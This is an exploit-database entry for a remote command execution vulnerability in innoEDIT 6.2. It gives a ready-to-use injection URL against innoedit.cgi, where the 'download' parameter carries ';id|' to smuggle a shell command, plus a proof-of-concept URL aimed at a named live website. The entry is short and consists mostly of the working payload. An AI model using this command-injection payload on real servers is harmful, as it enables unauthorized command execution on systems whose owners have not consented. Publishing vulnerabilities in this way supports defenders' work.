innoEDIT 6.2 Remote Command Execution



EKU-ID: 3908 CVE: OSVDB-ID:
Author: Felipe Andrian Peixoto Published: 2014-03-24 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


[+] Remote Comand Execution on innoEDIT
[+] Date: 21/03/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage : http://www.inno.com.mx/innoedit.htm
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on Windows 7 and Linux
[+] Vulnerable File: innoedit.cgi
[+] Version : Version 6.2
[+] Exploit: http://host/innoedit/innoedit.cgi?download=;id|
[+] PoC: http://www.mtyjet.com/innoedit/innoedit.cgi?download=;id|